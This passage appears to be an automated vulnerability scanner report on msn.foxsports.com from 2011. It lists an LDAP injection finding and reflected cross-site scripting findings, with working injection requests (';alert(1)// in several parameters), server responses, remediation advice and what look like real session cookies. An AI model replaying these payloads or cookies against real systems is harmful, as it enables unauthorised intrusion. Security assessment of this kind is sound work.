User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response 2

HTTP/1.1 200 OK
Server: PWS/1.7.1.2
Content-Length: 50931
Content-Type: text/html;charset=UTF-8
X-Px: ms iad-agg-n31 ( iad-agg-n33), ms iad-agg-n33 ( jfk-agg-n58), ms jfk-agg-n58 ( origin>CONN)
Cache-Control: max-age=3596
Expires: Sat, 08 Jan 2011 02:09:09 GMT
Date: Sat, 08 Jan 2011 01:09:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<META http-equiv="Content-Type" conten
...[SNIP]...
<ol scriptid="4195723982358" class="ez-mod-content">
<li class="ez-itemMod-item ez-Video ez-first ez-col ez-col-first ez-item-dynamic-snippets ">
<div class="ez-thumbs">
<a title="Under the Hood: Waiting for 'Dega" target="" rel="nofollow" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/34799455/under-the-hood-waiting-for-dega.htm?q=nascar_news"><img src="http://img2.catalog.video.msn.com/image.aspx?uuid=5378e33e-c227-468a-b4a0-a9a2c623d712&w=136&h=102" class="ez-primaryThumb"></a>
</div>
<div class="ez-main">
<a target="" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/34799455/under-the-hood-waiting-for-dega.htm?q=nascar_news" galabel="internal" class="ez-title">Under the Hood: Waiting for 'Dega </a>
<div class="ez-meta"></div>
<p class="ez-desc">Why is Talladega on the mind of Jimmie Johnson? FOXSports.com's Lee Spencer has the latest NASCAR news.</p>
</div>
<div class="ez-clearingDiv"></div>
</li>
<li class="ez-itemMod-item ez-Video ez-col ez-col-last ez-item-dynamic-snippets ">
<div class="ez-thumbs">
<a title="Under the Hood: What's the Problem?" target="" rel="nofollow" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/33661444/under-the-hood-what-s-the-problem.htm?q=nascar_news"><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=6c65fe5b-0c18-4ec6-80b3-89d405604f7a&w=136&h=102" class="ez-primaryThumb"></a>
</div>
<div class="ez-main">
<a target="" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/33661444/under-the-hood-what-s-the-problem.htm?q=nascar_news" galabel="internal" class="ez-title">Under the Hood: What's the Problem? </a>
<div class="ez-meta"></div>
<p class="ez-desc">
<b>&#133; </b>area and. Under our league gets out thanks for joining us and remember foxsports.com. Has you covered for all your
...[SNIP]...

2. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://msn.foxsports.com
Path:   /module/pollaction

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /module/*)(sn=*;jsessionid=B0E37D9CEC4284C917EBD810E61F000A HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
nnCoection: close
Date: Sat, 08 Jan 2011 01:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 11073

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
ramework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
   $Proxy96.getContent(Unknown Source)
   com.foxsports.action.module.ModuleAction.execute(ModuleAction.java:107)
   sun.reflect.GeneratedMethodAccessor21304.invoke(Unknown Source)
   sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
   java.lang.reflect.Method.invoke(Method.java:597)
   com.opensymphony.xwork2.DefaultActionInvocation.invokeAction(DefaultActionInvocation.java:441)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:243)
   com.opensymphony.xwork2.interceptor.DefaultWorkflowInterceptor.doIntercept(DefaultWorkflowInterceptor.java:165)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   org.apache.struts2.interceptor.validation.AnnotationValidationInterceptor.doIntercept(AnnotationValidationInterceptor.java:68)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor.intercept(ConversionErrorInterceptor.java:122)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.StaticParametersInterceptor.intercept(StaticParametersInterceptor.java:179)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237
...[SNIP]...

Request 2

GET /module/*)!(sn=*;jsessionid=B0E37D9CEC4284C917EBD810E61F000A HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
nnCoection: close
Date: Sat, 08 Jan 2011 01:32:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 11147

<html><head><title>Apache Tomcat/5.5.20 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...
ramework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
   $Proxy96.getContent(Unknown Source)
   com.foxsports.action.module.ModuleAction.execute(ModuleAction.java:107)
   sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
   sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:39)
   sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
   java.lang.reflect.Method.invoke(Method.java:597)
   com.opensymphony.xwork2.DefaultActionInvocation.invokeAction(DefaultActionInvocation.java:441)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:243)
   com.opensymphony.xwork2.interceptor.DefaultWorkflowInterceptor.doIntercept(DefaultWorkflowInterceptor.java:165)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   org.apache.struts2.interceptor.validation.AnnotationValidationInterceptor.doIntercept(AnnotationValidationInterceptor.java:68)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ConversionErrorInterceptor.intercept(ConversionErrorInterceptor.java:122)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.ParametersInterceptor.doIntercept(ParametersInterceptor.java:195)
   com.opensymphony.xwork2.interceptor.MethodFilterInterceptor.intercept(MethodFilterInterceptor.java:87)
   com.opensymphony.xwork2.DefaultActionInvocation.invoke(DefaultActionInvocation.java:237)
   com.opensymphony.xwork2.interceptor.StaticParametersInterceptor.intercept(StaticParametersInterceptor.java:179)
   com.opensymp
...[SNIP]...

3. Cross-site scripting (reflected)  previous  next
There are 26 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://msn.foxsports.com/account/transition [egs parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The value of the egs request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc9cb'%3balert(1)//579517f7bd5 was submitted in the egs parameter. This input was echoed as bc9cb';alert(1)//579517f7bd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/transition?fu=/&initiatingAction=verification&egs=KagpkMXaJne3LURVdXcQmhrRR28%3Dbc9cb'%3balert(1)//579517f7bd5&ts=1294446634&esefsuid=p/k94ON71KoD/EYqOMDzIDg%3D%3D HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D938A2E7A518304E1ECBC406440F8766; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 01:11:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:11:35 GMT
Connection: close
Content-Length: 4126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
UID = 'p/k94ON71KoD/EYqOMDzIDg==';            
   var dateStr = '1294446634';            // Current time in Unix format (i.e. the number of seconds since Jan. 1st 1970)
   var sig = 'KagpkMXaJne3LURVdXcQmhrRR28=bc9cb';alert(1)//579517f7bd5';                // Signature based on siteUID and dateStr

   var params={
    siteUID:EFSUID,
    timestamp:dateStr,
    signature:sig,
    callback: printResponse
   };

   i
...[SNIP]...

3.2. http://msn.foxsports.com/account/transition [esefsuid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The value of the esefsuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4808a'%3balert(1)//a486063946b was submitted in the esefsuid parameter. This input was echoed as 4808a';alert(1)//a486063946b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/transition?fu=/&initiatingAction=verification&egs=KagpkMXaJne3LURVdXcQmhrRR28%3D&ts=1294446634&esefsuid=p/k94ON71KoD/EYqOMDzIDg%3D%3D4808a'%3balert(1)//a486063946b HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1F26DDBC74FE63405456F8B293D5D77E; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 01:11:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:11:41 GMT
Connection: close
Content-Length: 4154


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<!--//
       try{
           if(!fsReqDomain){
               var fsReqDomain = '';
           }
       }catch(e){/*ignore */}
       
       try{
           var efsuid = 'p/k94ON71KoD/EYqOMDzIDg==4808a';alert(1)//a486063946b';
       }catch(e){/*ignore*/}
       
       //-->
...[SNIP]...

3.3. http://msn.foxsports.com/account/transition [fu parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The value of the fu request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80af3'%3balert(1)//c6e152d015f was submitted in the fu parameter. This input was echoed as 80af3';alert(1)//c6e152d015f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /account/transition?fu=/80af3'%3balert(1)//c6e152d015f&initiatingAction=verification&egs=KagpkMXaJne3LURVdXcQmhrRR28%3D&ts=1294446634&esefsuid=p/k94ON71KoD/EYqOMDzIDg%3D%3D HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: msn.foxsports.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=8DD6C8A3AD83DDE9E8FED569AAC4AC89; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 01:11:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 01:11:30 GMT
Connection: close
Content-Length: 4126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
};

function printResponse(response) {
